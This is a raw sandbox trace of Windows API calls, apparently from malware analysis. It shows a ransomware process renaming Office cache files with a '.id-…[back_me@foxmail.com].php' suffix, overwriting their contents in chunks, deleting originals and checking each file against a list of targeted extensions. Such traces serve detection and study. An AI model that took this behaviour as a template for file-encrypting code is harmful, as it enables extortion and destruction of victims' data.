12 [0046.070] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0046.071] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x3b0ff1c | out: lpFileSize=0x3b0ff1c*=4095519) returned 1 [0046.071] CloseHandle (hObject=0x184) returned 1 [0046.071] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab")) returned 0x2020 [0046.071] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.071] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0046.071] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0046.072] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc6c | out: lpNewFilePointer=0x0) returned 1 [0046.072] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc2c | out: lpNewFilePointer=0x0) returned 1 [0046.072] ReadFile (in: hFile=0x184, lpBuffer=0x43d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b0fc38, lpOverlapped=0x0 | out: lpBuffer=0x43d0058*, lpNumberOfBytesRead=0x3b0fc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.076] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x14d4b5, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc2c | out: lpNewFilePointer=0x0) returned 1 [0046.076] ReadFile (in: hFile=0x184, lpBuffer=0x4410058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b0fc38, lpOverlapped=0x0 | out: lpBuffer=0x4410058*, lpNumberOfBytesRead=0x3b0fc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.079] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x3b0fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0046.079] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x3a7e1f, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc2c | out: lpNewFilePointer=0x0) returned 1 [0046.079] ReadFile (in: hFile=0x184, lpBuffer=0x4450058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b0fc38, lpOverlapped=0x0 | out: lpBuffer=0x4450058*, lpNumberOfBytesRead=0x3b0fc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.093] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.093] WriteFile (in: hFile=0x184, lpBuffer=0x43d0020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x3b0fcb0, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesWritten=0x3b0fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0046.113] SetEndOfFile (hFile=0x184) returned 1 [0046.113] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x4a10048 [0046.333] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc7c | out: lpNewFilePointer=0x0) returned 1 [0046.333] WriteFile (in: hFile=0x184, lpBuffer=0x4a10048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b0fc88, lpOverlapped=0x0 | out: lpBuffer=0x4a10048*, lpNumberOfBytesWritten=0x3b0fc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.335] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x14d4b5, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc7c | out: lpNewFilePointer=0x0) returned 1 [0046.335] WriteFile (in: hFile=0x184, lpBuffer=0x4a10048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b0fc88, lpOverlapped=0x0 | out: lpBuffer=0x4a10048*, lpNumberOfBytesWritten=0x3b0fc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.337] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x3a7e1f, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc7c | out: lpNewFilePointer=0x0) returned 1 [0046.337] WriteFile (in: hFile=0x184, lpBuffer=0x4a10048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b0fc88, lpOverlapped=0x0 | out: lpBuffer=0x4a10048*, lpNumberOfBytesWritten=0x3b0fc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.339] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x4a10048 | out: hHeap=0xb10000) returned 1 [0046.341] CloseHandle (hObject=0x184) returned 1 [0046.342] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0046.342] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0046.342] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0046.342] lstrlenW (lpString=".doc") returned 4 [0046.342] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0046.342] lstrlenW (lpString=".docx") returned 5 [0046.342] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0046.342] lstrlenW (lpString=".pdf") returned 4 [0046.342] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0046.342] lstrlenW (lpString=".xls") returned 4 [0046.342] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0046.342] lstrlenW (lpString=".xlsx") returned 5 [0046.342] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0046.342] lstrlenW (lpString=".ppt") returned 4 [0046.342] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0046.342] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0046.342] lstrlenW (lpString=".zip") returned 4 [0046.342] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0046.342] lstrlenW (lpString=".rar") returned 4 [0046.342] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0046.342] lstrlenW (lpString=".bz2") returned 4 [0046.342] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0046.342] lstrlenW (lpString=".7z") returned 3 [0046.342] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0046.342] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0046.343] lstrlenW (lpString=".dbf") returned 4 [0046.343] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0046.343] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0046.343] lstrlenW (lpString=".1cd") returned 4 [0046.343] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0046.343] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0046.343] lstrlenW (lpString=".jpg") returned 4 [0046.343] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0046.343] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0046.343] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0046.343] lstrlenW (lpString=".doc") returned 4 [0046.343] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0046.343] lstrlenW (lpString=".docx") returned 5 [0046.343] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0046.343] lstrlenW (lpString=".pdf") returned 4 [0046.343] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0046.343] lstrlenW (lpString=".xls") returned 4 [0046.343] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0046.343] lstrlenW (lpString=".xlsx") returned 5 [0046.343] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0046.343] lstrlenW (lpString=".ppt") returned 4 [0046.343] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0046.343] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0046.343] lstrlenW (lpString=".zip") returned 4 [0046.343] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0046.343] lstrlenW (lpString=".rar") returned 4 [0046.343] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0046.343] lstrlenW (lpString=".bz2") returned 4 [0046.343] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0046.343] lstrlenW (lpString=".7z") returned 3 [0046.343] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0046.343] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0046.343] lstrlenW (lpString=".dbf") returned 4 [0046.343] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0046.344] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0046.344] lstrlenW (lpString=".1cd") returned 4 [0046.344] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0046.344] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0046.344] lstrlenW (lpString=".jpg") returned 4 [0046.344] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0046.344] lstrcmpiW (lpString1=".EXE", lpString2=".php") returned -1 [0046.344] lstrlenW (lpString="DW20.EXE") returned 8 [0046.344] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0046.491] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x3b0ff1c | out: lpFileSize=0x3b0ff1c*=838536) returned 1 [0046.537] CloseHandle (hObject=0x1f8) returned 1 [0046.537] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe")) returned 0x2020 [0046.537] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.537] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0046.537] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.537] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.537] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0047.102] GetLastError () returned 0x0 [0047.102] ReadFile (in: hFile=0x1f8, lpBuffer=0x43d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b0fed4, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesRead=0x3b0fed4*=0xccb88, lpOverlapped=0x0) returned 1 [0047.122] WriteFile (in: hFile=0x200, lpBuffer=0x43d0020*, nNumberOfBytesToWrite=0xccb90, lpNumberOfBytesWritten=0x3b0fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesWritten=0x3b0fc9c*=0xccb90, lpOverlapped=0x0) returned 1 [0047.150] ReadFile (in: hFile=0x1f8, lpBuffer=0x43d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b0fed4, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesRead=0x3b0fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.150] WriteFile (in: hFile=0x200, lpBuffer=0x43d0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x3b0fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesWritten=0x3b0fc9c*=0xe4, lpOverlapped=0x0) returned 1 [0047.150] SetEndOfFile (hFile=0x200) returned 1 [0047.150] CloseHandle (hObject=0x200) returned 1 [0047.151] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.151] SetEndOfFile (hFile=0x1f8) returned 1 [0047.157] CloseHandle (hObject=0x1f8) returned 1 [0047.158] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0047.158] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe")) returned 1 [0047.158] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0047.158] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0047.158] lstrlenW (lpString=".doc") returned 4 [0047.158] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0047.158] lstrlenW (lpString=".docx") returned 5 [0047.158] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1 [0047.158] lstrlenW (lpString=".pdf") returned 4 [0047.158] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0047.158] lstrlenW (lpString=".xls") returned 4 [0047.158] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0047.158] lstrlenW (lpString=".xlsx") returned 5 [0047.158] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1 [0047.158] lstrlenW (lpString=".ppt") returned 4 [0047.158] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0047.158] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0047.158] lstrlenW (lpString=".zip") returned 4 [0047.158] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0047.158] lstrlenW (lpString=".rar") returned 4 [0047.159] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0047.159] lstrlenW (lpString=".bz2") returned 4 [0047.159] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0047.159] lstrlenW (lpString=".7z") returned 3 [0047.159] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0047.159] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0047.159] lstrlenW (lpString=".dbf") returned 4 [0047.159] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0047.159] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0047.159] lstrlenW (lpString=".1cd") returned 4 [0047.159] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0047.159] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0047.159] lstrlenW (lpString=".jpg") returned 4 [0047.159] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0047.159] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0047.159] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0047.159] lstrlenW (lpString=".doc") returned 4 [0047.159] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0047.159] lstrlenW (lpString=".docx") returned 5 [0047.159] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1 [0047.159] lstrlenW (lpString=".pdf") returned 4 [0047.159] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0047.159] lstrlenW (lpString=".xls") returned 4 [0047.159] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0047.159] lstrlenW (lpString=".xlsx") returned 5 [0047.159] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1 [0047.159] lstrlenW (lpString=".ppt") returned 4 [0047.159] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0047.159] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0047.159] lstrlenW (lpString=".zip") returned 4 [0047.159] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0047.159] lstrlenW (lpString=".rar") returned 4 [0047.160] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0047.160] lstrlenW (lpString=".bz2") returned 4 [0047.160] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0047.160] lstrlenW (lpString=".7z") returned 3 [0047.160] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0047.160] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0047.160] lstrlenW (lpString=".dbf") returned 4 [0047.160] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0047.160] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0047.160] lstrlenW (lpString=".1cd") returned 4 [0047.160] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0047.160] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0047.160] lstrlenW (lpString=".jpg") returned 4 [0047.160] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0047.160] lstrcmpiW (lpString1=".cab", lpString2=".php") returned -1 [0047.160] lstrlenW (lpString="OfficeLR.cab") returned 12 [0047.160] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0047.438] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x3b0ff1c | out: lpFileSize=0x3b0ff1c*=14127746) returned 1 [0047.438] CloseHandle (hObject=0x208) returned 1 [0047.438] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab")) returned 0x2020 [0047.438] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.438] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0047.439] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0047.439] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc6c | out: lpNewFilePointer=0x0) returned 1 [0047.439] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.439] ReadFile (in: hFile=0x208, lpBuffer=0x43d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b0fc38, lpOverlapped=0x0 | out: lpBuffer=0x43d0058*, lpNumberOfBytesRead=0x3b0fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.444] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x47db80, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.444] ReadFile (in: hFile=0x208, lpBuffer=0x4410058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b0fc38, lpOverlapped=0x0 | out: lpBuffer=0x4410058*, lpNumberOfBytesRead=0x3b0fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.446] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x3b0fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0047.446] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0xd39282, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.446] ReadFile (in: hFile=0x208, lpBuffer=0x4450058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b0fc38, lpOverlapped=0x0 | out: lpBuffer=0x4450058*, lpNumberOfBytesRead=0x3b0fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.461] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.462] WriteFile (in: hFile=0x208, lpBuffer=0x43d0020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x3b0fcb0, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesWritten=0x3b0fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0047.790] SetEndOfFile (hFile=0x208) returned 1 [0047.790] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x432d940 [0047.795] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.795] WriteFile (in: hFile=0x208, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b0fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x3b0fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.796] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x47db80, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.796] WriteFile (in: hFile=0x208, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b0fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x3b0fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.797] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0xd39282, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.797] WriteFile (in: hFile=0x208, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b0fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x3b0fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.800] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x432d940 | out: hHeap=0xb10000) returned 1 [0047.800] CloseHandle (hObject=0x208) returned 1 [0047.800] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0047.801] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.801] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.801] lstrlenW (lpString=".doc") returned 4 [0047.801] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0047.801] lstrlenW (lpString=".docx") returned 5 [0047.801] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0047.801] lstrlenW (lpString=".pdf") returned 4 [0047.801] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0047.801] lstrlenW (lpString=".xls") returned 4 [0047.801] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 